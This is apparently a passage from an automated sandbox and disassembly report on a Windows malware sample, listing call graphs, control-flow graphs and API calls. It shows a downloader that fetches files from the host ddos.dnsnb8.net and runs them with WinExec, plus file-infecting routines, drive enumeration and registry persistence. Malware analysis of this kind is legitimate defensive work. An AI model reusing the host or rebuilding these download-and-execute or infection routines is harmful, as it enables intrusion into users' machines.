1185 b1c81 2 API calls 1184->1185 1186 b1f9f 1185->1186 1186->1169 1187 b1af9 169 API calls 1186->1187 1188 b2024 1186->1188 1189 b1fc0 1187->1189 1188->1169 1190 b1af9 169 API calls 1188->1190 1189->1169 1189->1188 1193 b1af9 169 API calls 1189->1193 1191 b207a 1190->1191 1192 b1af9 169 API calls 1191->1192 1196 b2090 1192->1196 1194 b1ffe 1193->1194 1195 b2013 FlushViewOfFile 1194->1195 1195->1188 1197 b20bb memset memset 1196->1197 1198 b20f5 1197->1198 1199 b1c81 2 API calls 1198->1199 1200 b21de 1199->1200 1201 b2226 memcpy UnmapViewOfFile FindCloseChangeNotification 1200->1201 1255 b1b8a 1201->1255 1203 b226e 1263 b185b GetSystemTimeAsFileTime srand rand srand rand 1203->1263 1205 b22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1206 b1915 3 API calls 1205->1206 1207 b231f FindCloseChangeNotification 1206->1207 1207->1169 1209 b2451 CreateFileA GetFileSize 1208->1209 1215 b23d8 1208->1215 1210 b2480 1209->1210 1211 b2675 CloseHandle 1209->1211 1210->1211 1213 b2499 1210->1213 1212 b267c RemoveDirectoryA 1211->1212 1214 b2687 1212->1214 1216 b1915 3 API calls 1213->1216 1214->1153 1215->1209 1215->1214 1217 b24a4 9 API calls 1216->1217 1265 b189d memset CreateProcessA 1217->1265 1220 b255c Sleep memset wsprintfA 1221 b29e2 163 API calls 1220->1221 1222 b2597 memset wsprintfA Sleep 1221->1222 1223 b189d 6 API calls 1222->1223 1224 b25e4 Sleep CreateFileA 1223->1224 1225 b1915 3 API calls 1224->1225 1226 b2610 CloseHandle 1225->1226 1226->1212 1227 b261e 1226->1227 1227->1212 1228 b2641 SetFilePointer WriteFile 1227->1228 1228->1212 1229 b2667 SetEndOfFile 1228->1229 1229->1212 1231 b26b2 WaitForSingleObject 1230->1231 1232 b26a2 CreateEventA 1230->1232 1233 b2708 1231->1233 1234 b26c1 lstrlen ??2@YAPAXI 1231->1234 1232->1231 1235 b2736 SetEvent 1233->1235 1237 b2718 lstrcpy ??3@YAXPAX 1233->1237 1234->1235 1236 b26da lstrcpy 1234->1236 1235->1153 1238 b26f1 1236->1238 1237->1238 1238->1235 1240 b1e13 lstrcpy strrchr 1239->1240 1241 b1e62 1239->1241 1240->1241 1242 b1e40 lstrcmpiA 1240->1242 1241->1169 1241->1170 1242->1241 1243 b1e52 lstrlen 1242->1243 1243->1241 1243->1242 1245 b1928 1244->1245 1248 b1924 SetFilePointer CreateFileMappingA MapViewOfFile 1244->1248 1246 b194f 1245->1246 1247 b192e memset GetFileTime 1245->1247 1246->1248 1249 b1954 SetFileTime 1246->1249 1247->1248 1248->1169 1248->1180 1249->1248 1251 b1c9c 1250->1251 1253 b1c94 1250->1253 1252 b1cae memset memset 1251->1252 1251->1253 1252->1253 1253->1169 1254 b185b GetSystemTimeAsFileTime srand rand srand rand 1253->1254 1254->1184 1256 b1b93 1255->1256 1264 b185b GetSystemTimeAsFileTime srand rand srand rand 1256->1264 1258 b1bca srand 1259 b1bd8 rand 1258->1259 1260 b1c08 1259->1260 1260->1259 1261 b1c29 memset memcpy lstrcat 1260->1261 1261->1203 1263->1205 1264->1258 1266 b190c 1265->1266 1267 b18e0 CloseHandle WaitForSingleObject 1265->1267 1266->1212 1266->1220 1268 b18fb GetExitCodeProcess 1267->1268 1269 b1907 CloseHandle 1267->1269 1268->1269 1269->1266 1279 b185b GetSystemTimeAsFileTime srand rand srand rand 1270->1279 1272 b27b5 wsprintfA CopyFileA 1273 b27de wsprintfA 1272->1273 1274 b2840 1272->1274 1275 b1973 17 API calls 1273->1275 1274->1131 1276 b280f 1275->1276 1277 b2813 DeleteFileA 1276->1277 1278 b2820 CreateFileA 1276->1278 1277->1278 1278->1274 1279->1272 1281 b1200 CloseHandle 1280->1281 1282 b11c6 AdjustTokenPrivileges 1280->1282 1281->1066 1283 b11f7 CloseHandle 1282->1283 1284 b11f6 1282->1284 1283->1281 1284->1283 1286 b123f GetCurrentProcessId OpenProcess 1285->1286 1287 b1310 1285->1287 1286->1287 1291 b1262 1286->1291 1287->1064 1294 b1319 1287->1294 1288 b12b0 VirtualAlloc 1288->1291 1293 b12b8 1288->1293 1289 b12f1 CloseHandle 1289->1287 1290 b1302 VirtualFree 1289->1290 1290->1287 1291->1288 1291->1289 1292 b1296 VirtualFree 1291->1292 1291->1293 1292->1288 1293->1289 1295 b134a 1294->1295 1296 b132a GetModuleHandleA GetProcAddress 1294->1296 1297 b1351 memset 1295->1297 1298 b1363 1295->1298 1296->1295 1296->1298 1297->1298 1298->1064 1298->1073 1299->1086 1301 b1196 1300->1301 1302 b10ba 1300->1302 1302->1301 1318 b185b GetSystemTimeAsFileTime srand rand srand rand 1302->1318 1304 b1118 wsprintfA wsprintfA URLDownloadToFileA 1305 b1168 lstrlen Sleep 1304->1305 1306 b10dc 1304->1306 1305->1302 1309 b1000 CreateFileA 1306->1309 1310 b1092 WinExec lstrlen 1309->1310 1311 b1025 GetFileSize CreateFileMappingA MapViewOfFile 1309->1311 1310->1301 1310->1302 1312 b107b 1311->1312 1313 b1057 1311->1313 1316 b108d CloseHandle 1312->1316 1317 b1087 CloseHandle 1312->1317 1314 b1061 1313->1314 1315 b1074 UnmapViewOfFile 1313->1315 1314->1315 1315->1312 1316->1310 1317->1316 1318->1304 1334 b2361 1335 b236b UnmapViewOfFile 1334->1335 1336 b2374 1334->1336 1335->1336 1337 b2379 CloseHandle 1336->1337 1338 b2382 1336->1338 1337->1338 1339 b2388 CloseHandle 1338->1339 1340 b2391 1338->1340 1339->1340 1320 b6076 1321 b607b 1320->1321 1325 b60c7 1320->1325 1323 b60b0 VirtualAlloc 1321->1323 1321->1325 1332 b61b2 1321->1332 1322 b615f VirtualFree 1322->1325 1323->1325 1324 b6198 VirtualFree 1324->1332 1325->1322 1325->1324 1326 b60d5 VirtualAlloc 1325->1326 1326->1325 1327 b6389 VirtualProtect 1330 b63b7 1327->1330 1328 b63fc VirtualProtect 1329 b6400 1328->1329 1330->1328 1331 b63e7 VirtualProtect 1330->1331 1331->1328 1331->1330 1332->1327 1333 b62fb 1332->1333 1341 b6014 1342 b6035 GetModuleHandleA 1341->1342 1344 b605f 1341->1344 1343 b604d GetProcAddress 1342->1343 1345 b6058 1343->1345 1345->1343 1345->1344 1345->1345

                                                            Callgraph

                                                            • Executed
                                                            • Not Executed
                                                            • Opacity -> Relevance
                                                            • Disassembly available
                                                            callgraph 0 Function_000B600A 1 Function_000B1B8A 36 Function_000B185B 1->36 2 Function_000B1D8A 3 Function_000B680F 4 Function_000B120E 5 Function_000B2B8C 35 Function_000B2845 5->35 49 Function_000B2B7D 5->49 6 Function_000B6B02 42 Function_000B6B63 6->42 7 Function_000B6001 7->0 8 Function_000B1C81 9 Function_000B1581 9->36 10 Function_000B1000 39 Function_000B17D0 10->39 11 Function_000B6D00 29 Function_000B69B0 11->29 11->42 51 Function_000B6CF2 11->51 12 Function_000B6A84 12->3 12->51 13 Function_000B2D9B 14 Function_000B1099 14->10 14->36 15 Function_000B1319 16 Function_000B1718 52 Function_000B2CF0 16->52 17 Function_000B119F 18 Function_000B139F 18->4 18->15 18->17 19 Function_000B189D 20 Function_000B239D 20->19 23 Function_000B1915 20->23 43 Function_000B29E2 20->43 21 Function_000B2692 22 Function_000B6012 24 Function_000B6014 25 Function_000B65A6 26 Function_000B67A4 27 Function_000B28B8 27->20 27->21 41 Function_000B1E6E 27->41 27->43 28 Function_000B1638 28->9 28->14 28->16 28->18 33 Function_000B2C48 28->33 28->39 30 Function_000B6834 31 Function_000B6734 31->6 31->11 31->12 32 Function_000B274A 32->36 50 Function_000B1973 32->50 33->5 33->50 34 Function_000B66C8 34->6 34->11 34->12 35->20 35->21 35->32 37 Function_000B6158 37->34 38 Function_000B235D 40 Function_000B1C68 41->1 41->2 41->8 41->13 41->23 41->36 41->40 46 Function_000B2D60 41->46 47 Function_000B1AF9 41->47 54 Function_000B1DF6 41->54 42->26 42->29 42->30 43->27 44 Function_000B14E1 44->28 44->47 45 Function_000B2361 45->13 47->28 48 Function_000B6CF8 49->43 50->36 51->48 53 Function_000B6076 53->34

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                            • String ID: %s*$C:\$Documents and Settings
                                                            • API String ID: 2826467728-110786608
                                                            • Opcode ID: f5577bc0d71a7272f1da302b54682ddf686c4005ddea5870e691998e814696f0
                                                            • Instruction ID: d1c5f4c73d6296944355c6a3507c235878114e046399808ba3ed3fe40ea07848
                                                            • Opcode Fuzzy Hash: f5577bc0d71a7272f1da302b54682ddf686c4005ddea5870e691998e814696f0
                                                            • Instruction Fuzzy Hash: 2C4153B2404349AFD761EBA0DC49DEBBBECEF84315F14093AF944D2111EA35D6488BA2

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 172 b1099-b10b4 173 b10ba-b10c7 172->173 174 b1199-b119c 172->174 175 b10c8-b10d4 173->175 176 b10da 175->176 177 b1184-b1190 175->177 178 b1113-b1162 call b185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 b1196-b1198 177->179 182 b1168-b1182 lstrlen Sleep 178->182 183 b10dc-b110d call b1000 WinExec lstrlen 178->183 179->174 182->177 182->178 183->178 183->179
                                                            APIs
                                                              • Part of subcall function 000B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,000B1118), ref: 000B1867
                                                              • Part of subcall function 000B185B: srand.MSVCRT ref: 000B1878
                                                              • Part of subcall function 000B185B: rand.MSVCRT ref: 000B1880
                                                              • Part of subcall function 000B185B: srand.MSVCRT ref: 000B1890
                                                              • Part of subcall function 000B185B: rand.MSVCRT ref: 000B1894
                                                            • WinExec.KERNEL32(?,00000005), ref: 000B10F1
                                                            • lstrlen.KERNEL32(000B4748), ref: 000B10FA
                                                            • wsprintfA.USER32 ref: 000B112A
                                                            • wsprintfA.USER32 ref: 000B1143
                                                            • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 000B115B
                                                            • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 000B1169
                                                            • Sleep.KERNEL32 ref: 000B1179
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                            • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                            • API String ID: 1280626985-3050893656
                                                            • Opcode ID: f98453647f47cdc0a6652704cf78d9a3abdc1b0abceffd90ef60772124cea0f8
                                                            • Instruction ID: 6f91a768d845ab32f379f98bc4144648aac626c864239b0119a0391e5d2a9ba4
                                                            • Opcode Fuzzy Hash: f98453647f47cdc0a6652704cf78d9a3abdc1b0abceffd90ef60772124cea0f8
                                                            • Instruction Fuzzy Hash: 7321C171810208BFEB20EBA0DC58FEFBBBCEB05305F610595E600A2152D7789B85CF60

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 216 b6076-b6079 217 b607b-b6080 216->217 218 b60e0-b60eb 216->218 219 b6082-b6085 217->219 220 b60f7-b60f8 217->220 221 b60ee-b60f4 218->221 222 b6087 219->222 223 b60f6 219->223 224 b60fa-b60fc call b66c8 220->224 225 b60fe-b6106 220->225 221->223 222->221 228 b6089-b6095 222->228 223->220 224->225 226 b6108-b611d 225->226 227 b6155-b6189 VirtualFree 225->227 230 b611f-b6121 226->230 238 b618c-b6192 227->238 231 b60a1-b60aa 228->231 232 b6097-b609f 228->232 234 b6123 230->234 235 b6151-b6154 230->235 236 b61ba-b61c8 231->236 237 b60b0-b60c1 VirtualAlloc 231->237 232->231 234->235 239 b6125-b6128 234->239 235->227 242 b61ca-b61d7 236->242 243 b6243-b6251 236->243 240 b60c7-b60cf 237->240 238->240 241 b6198-b61b0 VirtualFree 238->241 245 b612a-b612e 239->245 246 b6134-b613b 239->246 240->238 247 b60d5-b60df VirtualAlloc 240->247 241->236 250 b61b2-b61b4 241->250 244 b61dd-b61e0 242->244 248 b6253 243->248 249 b6264-b626f 243->249 244->243 252 b61e2-b61f2 244->252 245->246 259 b6130-b6132 245->259 246->259 260 b613d-b614f 246->260 247->218 255 b6255-b6258 248->255 251 b6271-b6276 249->251 250->236 256 b6389-b63b1 VirtualProtect 251->256 257 b627c-b6289 251->257 258 b61f5-b61fe 252->258 255->249 261 b625a-b6262 255->261 264 b63b7-b63ba 256->264 272 b628b 257->272 273 b6292-b6298 257->273 262 b620c-b6219 258->262 263 b6200-b6203 258->263 259->230 260->230 261->255 268 b6238-b623f 262->268 266 b621b-b6228 263->266 267 b6205-b6208 263->267 269 b63fc-b63ff VirtualProtect 264->269 270 b63bc-b63c2 264->270 266->268 274 b622a-b6236 267->274 275 b620a 267->275 268->258 276 b6241 268->276 271 b6400-b6416 269->271 270->270 277 b63c4 270->277 278 b6418-b641d 271->278 279 b6420-b6425 271->279 272->273 280 b62a2-b62ac 273->280 274->268 275->268 276->244 277->269 281 b63c6-b63cf 277->281 282 b62ae 280->282 283 b62b1-b62c8 280->283 284 b63d1 281->284 285 b63d4-b63d8 281->285 282->283 286 b62ce-b62d4 283->286 287 b6373-b6384 283->287 284->285 288 b63da 285->288 289 b63dd-b63e1 285->289 290 b62da-b62f1 286->290 291 b62d6-b62d9 286->291 287->251 288->289 292 b63e3 289->292 293 b63e7-b63fa VirtualProtect 289->293 295 b62f3-b62f9 290->295 296 b6365-b636e 290->296 291->290 292->293 293->264 293->269 297 b62fb-b630f 295->297 298 b6314-b6326 295->298 296->280 299 b6426-b64c0 297->299 300 b6328-b634a 298->300 301 b634c-b6360 298->301 310 b64c2 299->310 311 b6535-b6537 299->311 300->296 301->299 314 b64f8 310->314 315 b64c5-b64cd 310->315 312 b659a 311->312 313 b6539 311->313 318 b659b-b659d 312->318 316 b653b-b6541 313->316 317 b65b4 313->317 321 b64fa-b64fe 314->321 322 b656c-b656f 314->322 319 b64cf-b64d4 315->319 320 b6542-b6545 315->320 316->320 328 b65be-b6608 317->328 323 b659f 318->323 324 b6591-b6593 318->324 326 b6517-b651c 319->326 327 b64d6-b64d9 319->327 325 b654d-b6550 320->325 329 b6572 321->329 330 b6500 321->330 322->329 334 b6588-b658b 323->334 324->318 333 b6595 324->333 325->328 335 b6552-b6556 325->335 331 b651d-b651e 326->331 332 b6583-b6587 326->332 327->325 336 b64db-b64f5 327->336 337 b6573-b6576 329->337 338 b6522-b6533 330->338 339 b6502 330->339 331->338 332->334 333->312 340 b658d-b658f 334->340 341 b65a1-b65a3 334->341 342 b6578-b657f 335->342 343 b6558-b6569 335->343 336->314 337->342 338->311 339->337 344 b6504-b6513 339->344 340->324 342->332 343->322 344->311 346 b6515 344->346 346->326
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 000B60BE
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 000B60DF
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 000B6189
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 000B61A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID: kernel32.dll
                                                            • API String ID: 2087232378-1793498882
                                                            • Opcode ID: 929ea872e5b541aed596cd65505188882c25e333c978c1fb95b7380ddc329191
                                                            • Instruction ID: d68cd9496f81a17100c4eda5b16fcd6d860fb3d4bf032a9c118c343ad718a3dc
                                                            • Opcode Fuzzy Hash: 929ea872e5b541aed596cd65505188882c25e333c978c1fb95b7380ddc329191
                                                            • Instruction Fuzzy Hash: 611246B2508B849FDB328F64CC55BEA3BF4EF02310F1845ADD8898B293D779A911C755

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 348 b1718-b1733 GetSystemTimeAsFileTime 349 b1735-b1752 SHSetValueA 348->349 350 b1754-b1758 348->350 351 b17c6-b17cd 349->351 350->351 352 b175a-b1784 SHGetValueA 350->352 352->351 353 b1786-b17b3 call b2cf0 * 2 352->353 353->351 358 b17b5 353->358 359 b17bf 358->359 360 b17b7-b17bd 358->360 359->351 360->351 360->359
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B1729
                                                            • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 000B174C
                                                            • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 000B177C
                                                            • __aulldiv.LIBCMT ref: 000B1796
                                                            • __aulldiv.LIBCMT ref: 000B17A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: TimeValue__aulldiv$FileSystem
                                                            • String ID: C:\Users\user\AppData\Local\Temp\VSFdoO.exe$SOFTWARE\GTplus$Time
                                                            • API String ID: 541852442-2648737475
                                                            • Opcode ID: a25b2a6b9ed60d4e337c8e8d6aea17c6297b7999a3057b48046d1fb6d249d07a
                                                            • Instruction ID: d85219bc84285a7b214a7fce88ec095a1364ab63fa3d43bee4b9000116eb186c
                                                            • Opcode Fuzzy Hash: a25b2a6b9ed60d4e337c8e8d6aea17c6297b7999a3057b48046d1fb6d249d07a
                                                            • Instruction Fuzzy Hash: 9C119871A40209BBEB10DB94CC99FEF7FBDEB44B14F608515FA00B7181DA759A44CBA0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 361 b2b8c-b2bc6 memset GetLogicalDriveStringsA 362 b2c09-b2c28 WaitForMultipleObjects 361->362 363 b2bc8-b2bcc 361->363 366 b2c2a-b2c3a CreateThread 362->366 367 b2c3c-b2c45 362->367 364 b2bfa-b2c07 lstrlen 363->364 365 b2bce-b2bd0 363->365 364->362 364->363 365->364 368 b2bd2-b2bdc GetDriveTypeA 365->368 366->367 368->364 369 b2bde-b2be1 368->369 369->364 370 b2be3-b2bf6 CreateThread 369->370 370->364
                                                            APIs
                                                            • memset.MSVCRT ref: 000B2BA6
                                                            • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 000B2BB4
                                                            • GetDriveTypeA.KERNEL32(?), ref: 000B2BD3
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 000B2BEE
                                                            • lstrlen.KERNEL32(?), ref: 000B2BFB
                                                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 000B2C16
                                                            • CreateThread.KERNEL32(00000000,00000000,000B2845,00000000,00000000,00000000), ref: 000B2C3A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                            • String ID:
                                                            • API String ID: 1073171358-0
                                                            • Opcode ID: 306620287d1d2a4824aad4bf96869bf5417d2b8ecfc4cae7b3ad4ac5bdf79f23
                                                            • Instruction ID: cc04694e6932f13c05ff53e7afd3ed8b66613c5c0a6fb52e4dbc84c6398c8125
                                                            • Opcode Fuzzy Hash: 306620287d1d2a4824aad4bf96869bf5417d2b8ecfc4cae7b3ad4ac5bdf79f23
                                                            • Instruction Fuzzy Hash: F721B4B184015DAFE720AF64AC84DEF7BBDFF05348B240629F95292161DB389E06CB61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 16 b1e6e-b1e95 call b2d60 19 b1e9c-b1eaa call b1df6 16->19 20 b1e97 call b1d8a 16->20 24 b2332 19->24 25 b1eb0-b1ed9 SetFileAttributesA CreateFileA 19->25 20->19 26 b2338-b233b 24->26 25->24 27 b1edf-b1f28 call b1915 SetFilePointer CreateFileMappingA MapViewOfFile 25->27 28 b233d-b2340 UnmapViewOfFile 26->28 29 b2346-b2349 26->29 27->24 34 b1f2e-b1f39 27->34 28->29 32 b234b-b234e FindCloseChangeNotification 29->32 33 b2350-b2354 29->33 32->33 35 b2391-b239a call b2d9b 33->35 36 b2356-b235b CloseHandle 33->36 34->24 37 b1f3f-b1f56 34->37 36->35 37->24 39 b1f5c-b1f64 37->39 39->24 41 b1f6a-b1f70 39->41 41->24 42 b1f76-b1f87 call b1c81 41->42 42->24 45 b1f8d-b1fa7 call b185b call b1c81 42->45 45->24 50 b1fad-b1fb4 45->50 51 b1fb6-b1fc5 call b1af9 50->51 52 b2024-b2045 50->52 51->52 58 b1fc7-b1fd2 51->58 52->24 53 b204b-b204e 52->53 56 b2070-b20f4 call b1af9 * 2 call b1c68 * 2 memset * 2 53->56 57 b2050-b2053 53->57 78 b20f5-b20fe 56->78 60 b2056-b205a 57->60 58->24 61 b1fd8-b1fe7 58->61 60->56 63 b205c-b2061 60->63 64 b1fe9-b1fec 61->64 65 b1fef-b2006 call b1af9 61->65 63->24 67 b2067-b206e 63->67 64->65 73 b2008-b200e call b1c68 65->73 74 b2013-b201e FlushViewOfFile 65->74 67->60 73->74 74->52 79 b2130-b2139 78->79 80 b2100-b2114 78->80 83 b213c-b2142 79->83 81 b212d-b212e 80->81 82 b2116-b212a 80->82 81->78 82->81 84 b215c 83->84 85 b2144-b2150 83->85 88 b215f-b2162 84->88 86 b2152-b2154 85->86 87 b2157-b215a 85->87 86->87 87->83 89 b2181-b2184 88->89 90 b2164-b2171 88->90 93 b218d-b21ba call b1c68 89->93 94 b2186 89->94 91 b232a-b232d 90->91 92 b2177-b217e 90->92 91->88 92->89 97 b21bc-b21d0 call b1c68 93->97 98 b21d3-b220b call b1c81 call b1c68 93->98 94->93 97->98 105 b221b-b221e 98->105 106 b220d-b2218 call b1c68 98->106 108 b2220-b2223 105->108 109 b2226-b2328 memcpy UnmapViewOfFile FindCloseChangeNotification call b1b8a call b185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call b1915 FindCloseChangeNotification 105->109 106->105 108->109 109->26
                                                            APIs
                                                            • SetFileAttributesA.KERNEL32(?,00000080,?,000B32B0,00000164,000B2986,?), ref: 000B1EB9
                                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 000B1ECD
                                                            • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 000B1EF3
                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 000B1F07
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 000B1F1D
                                                            • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 000B201E
                                                            • memset.MSVCRT ref: 000B20D8
                                                            • memset.MSVCRT ref: 000B20EA
                                                            • memcpy.MSVCRT ref: 000B222D
                                                            • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B2238
                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B224A
                                                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B22C6
                                                            • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B22CB
                                                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B22DD
                                                            • WriteFile.KERNEL32(000000FF,000B4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B22F7
                                                            • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B230D
                                                            • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 000B2322
                                                            • UnmapViewOfFile.KERNEL32(?,?,000B32B0,00000164,000B2986,?), ref: 000B2340
                                                            • FindCloseChangeNotification.KERNEL32(?,?,000B32B0,00000164,000B2986,?), ref: 000B234E
                                                            • CloseHandle.KERNEL32(000000FF,?,000B32B0,00000164,000B2986,?), ref: 000B2359
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
                                                            • String ID:
                                                            • API String ID: 307705342-0
                                                            • Opcode ID: dba9c1649221353d57d157467752dcb7953c9b816a75df303ce7d66a7bd3152c
                                                            • Instruction ID: 29a3f47db5a54fba3a0647db5719e801a4b9ce01745a6f8465814a46110be12f
                                                            • Opcode Fuzzy Hash: dba9c1649221353d57d157467752dcb7953c9b816a75df303ce7d66a7bd3152c
                                                            • Instruction Fuzzy Hash: 83F13671900209EFDB20DFA8D894AEDBBB5FF08314F50462AE519A7662D734AE81CF54

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
